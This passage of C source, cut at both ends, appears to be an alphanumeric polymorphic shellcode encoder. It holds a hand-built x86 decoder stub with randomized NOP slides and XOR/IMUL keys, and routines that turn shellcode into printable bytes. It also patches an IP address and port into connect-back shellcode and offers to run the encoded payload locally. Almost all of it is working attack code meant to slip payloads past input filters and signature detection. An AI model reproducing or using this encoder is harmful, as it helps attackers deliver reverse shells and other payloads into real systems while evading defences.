/*27*/ '\x52', //push edx >----. | | | /*28*/ '\x59', //pop ecx <------' [ecx = address of decoder] | | | /*29*/ '\x47', //inc edi we increment ebx keeping the decoder | | | /*30*/ '\x43', //inc ebx length non-even (edi is unused) | | | //////////////// DECODER_LOOP_START /////////////////////////////////////////// | | | /*31*/ '\x58', //get address of the decoder //pop eax <---------. <--|-----------------. | | /*32*/ '\x52', //save edx //push edx [can use edx now]>---------------|----|---------------. | | | /*33*/ '\x51', //save ecx //push ecx [can use ecx now] >------------|----|-------------. | | | | /*34*/ '\x50', //save address of decoder //push eax [can use eax now] >---------|----|-----------. | | | | | /*35*/ '\x50', //save eax //push eax >----. | | | | | | | | /*36*/ '\x5A', //restore into edx //pop edx <------' | | | | | | | | /*38*/ '\x6A', xor_al2, //zero out al //push XOR_AL2 [al = 0] >----. | | | | | | | | /*39*/ '\x58', //zero out al //pop eax | | | | | | | | | /*41*/ '\x34', xor_al2, //zero out al //xor al,XOR_AL2 <----------' | | | | | | | | /*42*/ '\x50', //save al on the stack (al=0)//push eax >-----------------. | | | | | | | | /*45*/ '\x32', '\x42', offset_imul_key, //xor al,byte ptr [edx+off] | | | | | | | | | /*48*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >--this-zero's-the-key----. | | | | | | /*49*/ '\x58', //restore al from the stack (al=0)//pop eax <----------------------' | | | | | | | | | /*52*/ '\x32', '\x41', size_decoder+2, // get key in al //xor al,byte ptr [ecx+size+2] | | | | | | | | | /*55*/ '\x30', '\x42', offset_imul_key, //xor byte ptr [edx+off],al >---this-changes-the-key--|----. | | | | | | /*56*/ '\x58', //restore address of decoder //pop eax <---------------------------------|----|---|----|--' | | | | | /*57*/ '\x59', //restore ecx [word offset] //pop ecx <------------------------------|----|---|----|----' | | | | /*58*/ '\x5A', //restore edx [byte offset] //pop edx <---------------------------|----|---|----|------' | | | /*59*/ '\x50', //save address of decoder //push eax >---------------------------------|----|---|----|--------' | | /////////// START NOP_SLIDE_1 ///////////////////////////////////////////////// | | | | | | /*60*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*61*/ '\x49',/////////////////////////////////////dec ecx/////////////////////////// | | | | | | /*62*/ '\x41',/////////////////////////////////////inc ecx/////////////////////////// | | | | | | /*63*/ '\x49',/////////////////////////////////////dec ecx+-----------------------+// | | | | | | /*64*/ '\x41',// IMUL can go here and bellow //inc ecx| |// | | | | | | /*65*/ '\x49',// //dec ecx| 16 bytes |// | | | | | | /*66*/ '\x41',// //inc ecx| NOP slide |// | | | | | | /*67*/ '\x49',// //dec ecx| |// | | | | | | /*68*/ '\x41',// //inc ebx| can mungle eax until |// | | | | | | /*69*/ '\x49',// will be randomized //dec ebx| IMUL_INSTRUCTION |// | | | | | | /*70*/ '\x41',// //inc edx| |// | | | | | | /*71*/ '\x49',// //dec edx| |// | | | | | | /*72*/ '\x41',// //inc esi| |// | | | | | | /*73*/ '\x49',// //dec esi+-----------------------+// | | | | | | /*74*/ '\x41',// //push eax/////////////////////////// | | | | | | /*75*/ '\x49',// //pop eax//////////////////////// // | | | | | | //////////// END NOP_SLIDE_1 ////////////////////////////////////////////////// | | | | | | // | | | | | | // We can move around the IMUL_INSTRUCTION inside the NOP slides - but not before | | | | | | // MAX_OFFSET_OFFSET_IMUL i.e. we can't move it before the first 4 bytes of NOP_SLIDE_1 | | | | | | // or the offset will not be alphanumeric. | | | | | | // | | | | | | // We need to move the IMUL_INSTRUCTION in two byte increments, as we may modify eax in | | | | | | // NOP_SLIDE_1 and we can't change eax after the IMUL_INSTRUCTION (as the result goes | | | | | | // into eax) - this limitation can be overcome if we make sure not to modify eax after | | | | | | // the IMUL_INSTRUCTION - and it is easy enough, as we don't care about eax' value at | | | | | | // all - so we don't need to restore it. We can simply increment or decrement an unused | | | | | | // register instead. We happen to have such a register - edi =] | | | | | | // | | | | | | // So in NOP_SLIDE_1, we can't use push eax;pop eax unless they will not be split by | | | | | | // the IMUL_INSTRUCTION - because we would need the value of eax after the imul, and | | | | | | // the pop eax would overwrite it | | | | | | // | | | | | | // But we could use a dec eax;inc edi or a dec eax;dec edi combinations (inc eax is not | | | | | | // alphanumeric.). | | | | | | // | | | | | | // -OBSOLETE- | | | | | | // I have set here the IMUL_INSTRUCTION between NOP_SLIDE_1 and NOP_SLIDE_2 | | | | | | // If you wish to move it up, you will need to move it up by an even number of bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (add the number of bytes to it) | | | | | | // If you wish to move it down, you will need to move it down by an even number of | | | | | | // bytes. | | | | | | // You will then need to change OFFSET_OFFSET_IMUL accordingly | | | | | | // (deduct the number of bytes from it) | | | | | | // | | | | | | // TODO: make a routine that moves it around randomally between allowed values | | | | | | // and sets the proper offsets | | | | | | // this routine should be called after the NOP slides have been randomized. | | | | | | // | | | | | | ////////// START NOP_SLIDE_2 //////////////////////////////////////////////////// | | | | | | /*76*/ '\x41',// //inc ecx/////////////////////////// | | | | | | /*77*/ '\x49',// //dec ecx/////////////////////////// | | | | | | /*78*/ '\x41',// //inc ebx/////////////////////////// | | | | | | /*79*/ '\x49',// //dec ebx+-----------------------+// | | | | | | /*80*/ '\x41',// will be randomized //inc edx| |// | | | | | | /*81*/ '\x49',// //dec edx| 12 bytes |// | | | | | | /*82*/ '\x41',// //inc esi| NOP slide |// | | | | | | /*83*/ '\x49',// //dec esi| |// | | | | | | /*84*/ '\x41',// //push eax| |// | | | | | | /*85*/ '\x49',// //pop eax| |// | | | | | | /*86*/ '\x41',// //inc ecx+-----------------------+// | | | | | | /*87*/ '\x49',// //dec ecx/////////////////////////// | | | | | | // IMUL can go down to here | | | | | | ///////// [step_1] //imul eax,dword ptr [ecx+size_decoder+1],45h | | | | | | /*91*/imul_instruction_1, imul_instruction_2, imul_instruction_3, imul_instruction_4,// <-This-key-will-change-' | | ////////// END NOP_SLIDE_2//////////////////////////////////////////////////// | | | | /*92 */ '\x41', //ecx incremented once //inc ecx ---------------------. | | | | /*95 */ '\x33', '\x41', size_decoder, //[step_2]//xor eax,dword ptr [ecx+size] | <--------------------store decoded | | /*98 */ '\x32', '\x42', size_decoder, //xor al,byte ptr [edx+size] |ecx = ecx+2 | | byte | | /*101*/ '\x30', '\x42', size_decoder, //xor byte ptr [edx+size],al | | |(eax=result of IMUL) | | /*102*/ '\x41', //ecx incremented twice //inc ecx ---------------------' | | | | /*103*/ '\x42', //edx incremented once //inc edx edx = edx+1 | | | | /*104*/ '\x45', //ebp incremented once //inc ebp | | | | /*107*/ '\x39', '\x34', '\x6B', //cmp dword ptr [ebx+ebp*2],esi // check if we reached the end | | /*109*/ '\x75', jne_xor2, // <===0xB1 //jne DECODER_LOOP_START >--------------' <--' | | '\x00' // If you change the length of the decoder, the jne would need to jump to a different offset than 0xB1 | | };////////////////////////////////////////////////// | | UINT shrink; // | | UCHAR *found_msg; // | | UCHAR *p_decoder = decoder; // | | UCHAR xor1, xor2, key; // | | UCHAR temp_buf[3] = ""; // | | UCHAR alnum_shellcode[MAX_ENCODED_SHELLCODE] = "";// | | UCHAR *p_alnum_shellcode = alnum_shellcode; // todo: allow for the key to be either the first, | | struct xor2_key *p_xor2_key = 0; // the second or the third byte (currently third). | | UCHAR *p_shellcode = shellcode; // | | void *_eip = 0; // | | // | | int offset_nop_slide1; // | | int offset_nop_slide2; // | | int offset_half_size_decoder; // | | int offset_terminating_key; // | | int offset_imul_instruction1; // | | int offset_imul_instruction2; // | | int offset_imul_instruction3; // | | int offset_imul_instruction4; // | | int negative_offset_size_decoder1; // | | int negative_offset_size_decoder2; // | | int negative_offset_size_decoder3; // | | int offset_size_decoder_min_1; // | | int offset_size_decoder_pls_2; // | | int offset_imul_key_offset1; // | | int offset_imul_key_offset2; // | | int offset_imul_key_offset3; // | | int offset_imul_instruction; // | | int size_nop_slide1; // | | int size_nop_slide2; // | | int offset_jne_xor1; // | | int offset_jne_xor2; // | | int decoder_length_section1; // | | int decoder_length_section2; // | | int decoder_length_section3; // | | int imul_instruction_length; // | | int jne_xor_negative_offset; // | | int backward_slide_offset; // | | BOOL decoder_version_1; // | | UINT srand_value; // | | #ifdef CONNECT_BACK_SHELLCODE ///////////////////////////////////////////// | | printf("scanning EncodedShellcode for shellcode up to OFFSET_IP_ADDRESS bytes\n"); // | | found_msg = scan_str_known_pattern(EncodedShellcode, shellcode, OFFSET_IP_ADDRESS); // | | if (found_msg) printf("shellcode found encoded in EncodedShellcode using %s.\n", found_msg); // | | else printf("shellcode not found encoded in EncodedShellcode.\n");///////////////////////////// | | #endif ////////////////// | | printf("shellcode length:%d\n", size); // | | srand_value = time(NULL); // | | // srand_value = ; // for debugging | | srand(srand_value); // | | printf("srand value=%d\n", srand_value); // | | decoder_version_1 = rand() % 2; // | | ///// | | size_decoder = strlen(decoder);// | | decoder_length_section1 = 30; ////////////// | | decoder_length_section2 = 29; // | | decoder_length_section3 = 18; // | | // | | size_nop_slide1 = 28; // | | size_nop_slide2 = 0; // | | // | | imul_instruction_length = 4; // | | // | | shrink = (rand()%6)*2; //////////////////////////////////////////////////// (can shrink up to 10 bytes | | memmove(decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1-shrink, // in 2 byte increments) | | decoder+decoder_length_section1+decoder_length_section2+size_nop_slide1, // | | imul_instruction_length+size_nop_slide2+decoder_length_section3+1); // | | size_decoder -=shrink; /////////////////////////////////////////////////////// | | half_size_decoder = size_decoder/2; // | | size_nop_slide1 -=shrink; ///////////////////////// | | printf("shrinking decoder by: %d\n", shrink); // | | // | | offset_imul_instruction = decoder_length_section1+// | | decoder_length_section2+// | | size_nop_slide1;////////// | | // | | backward_slide_offset = rand() % 15; // (selects a number from 0 to 14 in increments of 1) | | strncpy(decoder, // | | slide_substr_back(decoder, // | | offset_imul_instruction, // | | imul_instruction_length, // | | size_decoder, ///// | | backward_slide_offset), // | | size_decoder); // | | offset_imul_instruction -=backward_slide_offset; // | | size_nop_slide1 -=backward_slide_offset; // | | size_nop_slide2 +=backward_slide_offset; ////////////// | | printf("backward_slide_offset = %d\n", backward_slide_offset);// | | /////////////////////////////////// | | negative_offset_size_decoder1 = 9; // | | negative_offset_size_decoder2 = 12; // | | negative_offset_size_decoder3 = 15; // | | // | | offset_half_size_decoder = 6; // | | offset_terminating_key = 8; // | | offset_jne_xor1 = 21; // | | offset_size_decoder_min_1 = 24; // | | // | | offset_imul_key_offset1 = 14 + decoder_length_section1; // | | offset_imul_key_offset2 = 17 + decoder_length_section1; // | | offset_size_decoder_pls_2 = 21 + decoder_length_section1; // | | offset_imul_key_offset3 = 24 + decoder_length_section1; // | | // | | offset_nop_slide1 = decoder_length_section1+ // | | decoder_length_section2; // | | offset_nop_slide2 = decoder_length_section1+ // | | decoder_length_section2+ // | | size_nop_slide1+ // | | imul_instruction_length; // | | // | | offset_imul_instruction1 = offset_imul_instruction; // | | offset_imul_instruction2 = offset_imul_instruction+1; // | | offset_imul_instruction3 = offset_imul_instruction+2; // | | offset_imul_instruction4 = offset_imul_instruction+3; // | | // | | // | | offset_imul_key = offset_imul_instruction4; // | | // | | offset_jne_xor2 = size_decoder-1; // | | jne_xor_negative_offset = decoder_length_section3+ // | | decoder_length_section2+ // | | size_nop_slide2+ // | | imul_instruction_length+ // | | size_nop_slide1; // | | // | | // | | printf("size_decoder=0x%2X - %s\n", // | | (UCHAR)size_decoder, ////// | | is_alnum((UCHAR)size_decoder+(decoder_version_1?0:2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_imul_instruction3) = size_decoder+(decoder_version_1?0:2); ////// | | // | | printf("half_size_decoder=0x%2X - %s\n", // | | (UCHAR)half_size_decoder, // | | is_alnum((UCHAR)half_size_decoder)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_half_size_decoder) = half_size_decoder; // | | // | | printf("offset_imul_key=0x%2X - %s\n", // | | (UCHAR)offset_imul_key, // | | is_alnum((UCHAR)offset_imul_key)?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_imul_key_offset1) = offset_imul_key; // | | *(decoder+offset_imul_key_offset2) = offset_imul_key; // | | *(decoder+offset_imul_key_offset3) = offset_imul_key; // | | // // | | printf("size_decoder-1=0x%2X - %s\n", // | | (UCHAR)size_decoder-1, // | | is_alnum((UCHAR)(size_decoder-1))?"valid":"invalid - not alphanumeric!!!"); // | | *(decoder+offset_size_decoder_min_1) = size_decoder-1; // | | // | | printf("size_decoder+2=0x%2X - %s\n", // | | (UCHAR)size_decoder+2, //////// | | is_alnum((UCHAR)(size_decoder+(decoder_version_1?2:0)))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+offset_size_decoder_pls_2) = size_decoder+(decoder_version_1?2:0); //////// | | // | | *(decoder+size_decoder-negative_offset_size_decoder1) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder2) = size_decoder; // | | *(decoder+size_decoder-negative_offset_size_decoder3) = size_decoder; ////////////////////////////// | | // | | *(decoder+offset_jne_xor1) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 0); // | | *(decoder+offset_jne_xor2) = get_two_xor_complemets_for_byte_and_xor((UCHAR)(-jne_xor_negative_offset),// | | '\xFF', // | | 1); // | | #ifdef CONNECT_BACK_SHELLCODE // | | ip_address = ip_str_to_dw(IP_ADDRESS);/////////////////////////////////////////////////// | | if (ip_address == -1) /////////////////////////////////////////////////// | | exit(-1); // | | /////////////////////////////////// | | //set shellcode with ip address and port for connect-back // | | ///* ////////// | | *((DWORD *)(p_shellcode+OFFSET_IP_ADDRESS)) = ip_address;///////////////// | | *((DWORD *)(p_shellcode+OFFSET_TCP_PORT_NUMBER)) = my_htonl(TCP_PORT_NUMBER);// | | *(p_shellcode+OFFSET_TCP_PORT_NUMBER) = (UCHAR)2; // | | #endif ////////////////////////////////////////// | | //*/ // | | //set decoder with 'random' nop slides // | | strncpy(decoder+offset_nop_slide1, //////////////////////////// | | shuffle(get_nop_slide(size_nop_slide1, 1), size_nop_slide1),// | | size_nop_slide1); // | | strncpy(decoder+offset_nop_slide2, // | | shuffle(get_nop_slide(size_nop_slide2, 2), size_nop_slide2),// | | size_nop_slide2); /////////////////////////////// | | // | | //set decoder with random initial key //////////////////////////////////////////// | | *(decoder+offset_imul_key) = get_random_alnum_value();// | | printf("initial key=0x%2X - %s\n", ////////////// | | (UCHAR)*(decoder+offset_imul_key), // | | is_alnum((UCHAR)*(decoder+offset_imul_key))?"valid":"invalid - not alphanumeric!!!"); // | | // | | ////////////// | | // | | //set decoder with 'random' dword pushes for registers we won't use //////////////// | | *(decoder+OFFSET_PUSH_DWORD1) = get_random_alnum_push_dword_opcode(); // | | printf("push dword1=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD1), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD1))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD2) = get_random_alnum_push_dword_opcode(); // | | printf("push dword2=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD2), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD2))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD3) = get_random_alnum_push_dword_opcode(); // | | printf("push dword3=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD3), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD3))?"valid":"invalid - not alphanumeric!!!");// | | *(decoder+OFFSET_PUSH_DWORD4) = get_random_alnum_push_dword_opcode(); // | | printf("push dword4=0x%2X - %s\n", // | | (UCHAR)*(decoder+OFFSET_PUSH_DWORD4), // | | is_alnum((UCHAR)*(decoder+OFFSET_PUSH_DWORD4))?"valid":"invalid - not alphanumeric!!!");// | | // | | //bugfix: this time after srand() :) // | | xor_al1=get_random_alnum_value(); // | | xor_al2=get_random_alnum_value(); // | | *(decoder+OFFSET_XOR_AL1_A) = xor_al1; // | | *(decoder+OFFSET_XOR_AL1_B) = xor_al1; // | | *(decoder+OFFSET_XOR_AL2_A) = xor_al2; // | | *(decoder+OFFSET_XOR_AL2_B) = xor_al2; // | | // | | memcpy(decoder+OFFSET_RANDOMIZED_DECODER_HEAD, ////// | | randomize_decoder_head(decoder, size_decoder, xor_al1, *(decoder+offset_jne_xor1)), // <---here-------------------------|---' SIZE_RANDOMIZED_DECODER_HEAD); ////// | //set first xor1 to random alnum value (this is the first byte of the encoded data) // | xor1 = get_random_alnum_value(); // | printf("xor1=0x%2X - %s\n", // | (UCHAR)xor1, // | is_alnum((UCHAR)xor1)?"valid":"invalid - not alphanumeric!!!"); // | ///////////////////////////////////////////////////////// | RE_RUN: // | sprintf(alnum_shellcode, "%s",decoder); // | memset(temp_buf, 0, 3);/////////////////// | for(i=0; i<size; i++) // | { ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// | // each original byte is encoded into 3 alphanumeric bytes where first_byte*third_byte^second_byte==original_byte // | // third_byte is the next encoded original byte's first_byte // | // the first byte of the terminating key is the last byte's third_byte /////// | p_xor2_key=get_xor2_and_key_for_xor1_and_c(xor1, shellcode[i]);//get a list of second_byte and third_byte for first_byte// | if(!p_xor2_key) /////// | goto RE_RUN; // | p_xor2_key = choose_random_node(p_xor2_key);//choose a random combination//////////////////////////////////////////// | key=p_xor2_key->key; // | xor2=p_xor2_key->xor2; // | temp_buf[0] = xor1; // | temp_buf[1] = xor2; // | strcat(alnum_shellcode, temp_buf); // append it to our decoder // | xor1=key; // | free_p_xor2_key(p_xor2_key); // free the list // | } //get next original_byte // | //////////////////////// | if (terminating_key_exist(alnum_shellcode+sizeof(decoder), str_end_of_encoded_shellcode))// | { // | printf("error - terminating key found in encoded shellcode. running again to fix\n");// | goto RE_RUN; // | } ///////////////////////////////////////////////////// | *(UCHAR*)(alnum_shellcode+8) = key; // set the last key of the encoded data to be the first byte of the terminating string | *(UCHAR*)(alnum_shellcode+9) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+10) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| *(UCHAR*)(alnum_shellcode+11) = get_random_alnum_value(); // choose 3 random alnum bytes for the rest of the terminating string| strncat(alnum_shellcode, // append the terminating string to the decoder+encoded shellcode | (UCHAR*)(alnum_shellcode+offset_terminating_key), ////////////////////////////// | 4); // | // | //bugfix: handle case of esp pointing to shellcode // | if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) // | { // | // _asm{ // | // push esp; // | // pop eax; // | // xor al, 0x36; // | // xor al, 0x30; // | // } // | p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+6); // | memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+6); // | memcpy(p_alnum_shellcode+6, alnum_shellcode, strlen(alnum_shellcode)+1); // | p_alnum_shellcode[0] = 'T'; // | p_alnum_shellcode[1] = 'X'; // todo: randomize by using other registers than eax // | p_alnum_shellcode[2] = '4'; // and using other xor values // | p_alnum_shellcode[3] = '6'; // <-- (x+6) // | p_alnum_shellcode[4] = '4'; // // | p_alnum_shellcode[5] = '0'; // <-- x // | p_alnum_shellcode[8] = get_push_register_instruction("eax"); // | p_alnum_shellcode[9] = get_push_register_instruction("eax"); // | size_decoder += 6; // | } // | // | printf("encoded shellcode length: %d\n", strlen(alnum_shellcode)-size_decoder); // | printf("decoder length: %d\n%s\n", // | size_decoder, // | p_alnum_shellcode); // | // | printf("scanning alnum_shellcode for shellcode up to size bytes\n"); // | found_msg = scan_str_known_pattern(alnum_shellcode, shellcode, size); ///////// | if (found_msg) printf("shellcode found encoded in alnum_shellcode using %s.\n", found_msg); // | else printf("shellcode not found encoded in alnum_shellcode.\n"); /////////////////////////// | // | if (str_is_alnum(alnum_shellcode)) // | { // | printf("execute shellcode locally? (hit: y and press enter): ");// | if(tolower(getchar()) == 'y') // | { ///////////// | _asm // | { // | push p_alnum_shellcode; //////// | pop REGISTER_WITH_ADDRESS_OF_SHELLCODE;// <------------------------------------------------------------------------' //jump to head of decoder // jmp REGISTER_WITH_ADDRESS_OF_SHELLCODE;// } ////////////// } // } // else // { /////////////// printf("error non-alphanumeric shellcode\n"); // } ////////////////////////////// ///////// // return 0; ////// } // /////////////////// BOOL arg1_imul_arg2_xor_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*alnum_str[offset+offset2])^alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*alnum_str[offset+offset2+1])^alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_xor_arg2_imul_arg3(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UINT offset1, UINT offset2, UINT offset3) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]^alnum_str[offset+offset2])*alnum_str[offset+offset3])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]^alnum_str[offset+offset2+1])*alnum_str[offset+offset3+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } BOOL arg1_imul_key_xor_arg2(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length, UCHAR key, UINT offset1, UINT offset2) { UINT offset, i, found; for (i=found=offset=0; i<known_pattern_length; i++) { while(*(alnum_str+offset)) { if((UCHAR)((alnum_str[offset+offset1]*key)^alnum_str[offset+offset2])== (UCHAR)known_pattern[i]) { offset+=2; found++; break; } else if((UCHAR)((alnum_str[offset+offset1+1]*key)^alnum_str[offset+offset2+1])== (UCHAR)known_pattern[i]) { offset+=3; found++; break; } else { found=0; i=0; offset++; } } } if(found == known_pattern_length) return 1; else return 0; } UCHAR *scan_str_known_pattern(UCHAR *alnum_str, UCHAR *known_pattern, UINT known_pattern_length) { UCHAR *alnum = malloc(strlen(ALNUM_CHARSET)+1); UCHAR *temp_buf = malloc(255); strncpy(alnum, ALNUM_CHARSET, strlen(ALNUM_CHARSET)); alnum[strlen(ALNUM_CHARSET)]=0; memset(temp_buf, 0, 255); //this is not for production, just a poc... while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 0, 1)) { alnum--; strcat(temp_buf, "(buf[0]*'"); temp_buf[strlen(temp_buf)] = *alnum; strcat(temp_buf, "')^buf[1]"); return(temp_buf); } } alnum-=strlen(ALNUM_CHARSET); while(*alnum) { if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, *alnum++, 1, 0)) { alnum--; printf("key = 0x%2X ('%c')\n", *alnum, *alnum); return("found pattern using: (buf[1]*key)^buf[0]\n"); } } if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 0, 1)) return("(buf[0]*0x30)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x30, 1, 0)) return("(buf[1]*0x30)^buf[0]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 0, 1)) return("(buf[0]*0x10)^buf[1]"); else if (arg1_imul_key_xor_arg2(alnum_str, known_pattern, known_pattern_length, 0x10, 1, 0)) return("(buf[1]*0x10)^buf[0]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]*buf[1])^buf[2]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]*buf[2])^buf[1]"); else if (arg1_imul_arg2_xor_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]*buf[2])^buf[0]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 1, 2)) return("(buf[0]^buf[1])*buf[2]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 0, 2, 1)) return("(buf[0]^buf[2])*buf[1]"); else if (arg1_xor_arg2_imul_arg3(alnum_str, known_pattern, known_pattern_length, 1, 2, 0)) return("(buf[1]^buf[2])*buf[0]"); else return ""; } BOOL is_alnum(UCHAR c) { char *alnum = ALNUM_CHARSET; char search_c[2] = ""; search_c[0] = c; return((BOOL)strstr(alnum, search_c)); } BOOL str_is_alnum(UCHAR *str) { ULONG length; length = strlen(str); for(;length>0;length--) { if( !is_alnum(str[length-1]) ) return 0; } return 1; } UCHAR get_two_xor_complemets_for_byte_and_xor(UCHAR byte, UCHAR xor, int index) { int xor_complement_1, xor_complement_2; UCHAR two_xor_complements[3]; for(xor_complement_1=0; xor_complement_1<MAX_BYTES; xor_complement_1++) { if (is_alnum((UCHAR)xor_complement_1)) { for(xor_complement_2=0; xor_complement_2<MAX_BYTES; xor_complement_2++) { if (is_alnum((UCHAR)xor_complement_2)) { if(byte == (xor ^ xor_complement_1 ^ xor_complement_2)) { two_xor_complements[0] = (UCHAR)xor_complement_1; two_xor_complements[1] = (UCHAR)xor_complement_2; } } } } } if(index == 0 || index == 1) return two_xor_complements[index]; else return (UCHAR)0; } BOOL terminating_key_exist(UCHAR *alnum_shellcode, UCHAR *terminating_key) { return (BOOL) strstr(alnum_shellcode, terminating_key); } DWORD ip_str_to_dw(UCHAR *str) { DWORD x[4]; int dwIpAddress; if (!str || MAX_IP_STR_LEN < strlen(str) || strlen(str) < MIN_IP_STR_LEN) return -1; sscanf(str, "%d.%d.%d.%d", &x[0],&x[1],&x[2],&x[3]); x[3] = x[3] > 255 ? -1 : (x[3] <<= 24); x[2] = x[2] > 255 ? -1 : (x[2] <<= 16); x[1] = x[1] > 255 ? -1 : (x[1] <<= 8); x[0] = x[0] > 255 ? -1 : (x[0] <<= 0); dwIpAddress = x[0]+x[1]+x[2]+x[3]; return dwIpAddress; } DWORD my_htonl(DWORD dw_in) { DWORD dw_out; *((UCHAR *)&dw_out+3) = *((UCHAR *)&dw_in+0); *((UCHAR *)&dw_out+2) = *((UCHAR *)&dw_in+1); *((UCHAR *)&dw_out+1) = *((UCHAR *)&dw_in+2); *((UCHAR *)&dw_out+0) = *((UCHAR *)&dw_in+3); return dw_out; } void free_p_xor2_key(struct xor2_key *node) { struct xor2_key *temp = 0; if(node) { temp = node->prev; while(node->next) { node=node->next; free(node->prev); } free(node); } if(temp) { while(temp->prev) { temp=temp->prev; free(temp->next); } free(temp); } } struct xor2_key *choose_random_node(struct xor2_key *head) { int num_nodes = 1, selected_node, i; struct xor2_key* tail = head; struct xor2_key* pn = NULL ; if (!head || !head->key) return 0; while(tail->next) { tail = tail->next; num_nodes++; } selected_node = rand()%num_nodes; for(i=0; i<selected_node; i++) head = head->next; return head; } struct xor2_key *get_xor2_and_key_for_xor1_and_c(UCHAR xor1, UCHAR c) { struct xor2_key *p_xor2_key, *p_xor2_key_head; char *alnum = ALNUM_CHARSET; UINT i=0, z=1, r=0, count=0; UCHAR xor2=0, x=0; p_xor2_key_head = p_xor2_key = malloc(sizeof(xor2_key)); p_xor2_key->prev = 0; p_xor2_key->next = 0; p_xor2_key->key = 0; p_xor2_key->xor2 = 0; for(i=0; alnum[i]; i++) { for(x=0; alnum[x];x++) { xor2 = alnum[x]; if (((UCHAR)(xor1 * alnum[i]) ^ xor2) == c) { p_xor2_key->xor2 = xor2; p_xor2_key->key = alnum[i]; p_xor2_key->next = malloc(sizeof(struct xor2_key)); p_xor2_key->next->prev = p_xor2_key; p_xor2_key = p_xor2_key->next; p_xor2_key->key=0; p_xor2_key->xor2=0; } } } if(!p_xor2_key->key) p_xor2_key->next = 0; if (p_xor2_key->prev) p_xor2_key = p_xor2_key->prev; else return 0; free(p_xor2_key->next); p_xor2_key->next=0; return p_xor2_key_head; } UCHAR *shuffle(UCHAR str[], UINT length) //length does not include terminating null. { UINT last, randomNum; UCHAR temporary; UCHAR *output = malloc(length); memcpy(output, str, length); for (last = length; last > 1; last--) { randomNum = rand( ) % last; temporary = output[randomNum]; output[randomNum] = output[last-1]; output[last-1] = temporary; } memcpy(str, output, length); return output; }// taken from: http://www.warebizprogramming.com/text/cpp/section6/part8.htm UCHAR *slide_substr_back(UCHAR *str, UINT substr_offset, UINT substr_len, UINT str_len, UINT slide) { UCHAR *prefix_substr, *substr, *suffix_substr, *output_str; UINT prefix_substr_len, suffix_substr_len; if(slide > substr_offset) { printf("you can't slide it that far back!\n"); return 0; } output_str = malloc(str_len); memset(output_str, 0 , str_len); suffix_substr_len = str_len-substr_len-substr_offset; suffix_substr = malloc(suffix_substr_len); memset(suffix_substr, 0, suffix_substr_len); prefix_substr_len = substr_offset; prefix_substr = malloc(prefix_substr_len); memset(prefix_substr, 0, prefix_substr_len); substr = malloc(substr_len); memset(substr, 0, substr_len); strncpy(substr, str+substr_offset, substr_len); strncpy(prefix_substr, str, prefix_substr_len); strncpy(suffix_substr, str+substr_offset+substr_len, suffix_substr_len); strncpy(output_str, prefix_substr, prefix_substr_len-slide); strncpy(output_str+prefix_substr_len-slide, substr, substr_len); strncpy(output_str+prefix_substr_len-slide+substr_len, str+substr_offset-slide, slide); strncpy(output_str+prefix_substr_len-slide+substr_len+slide, 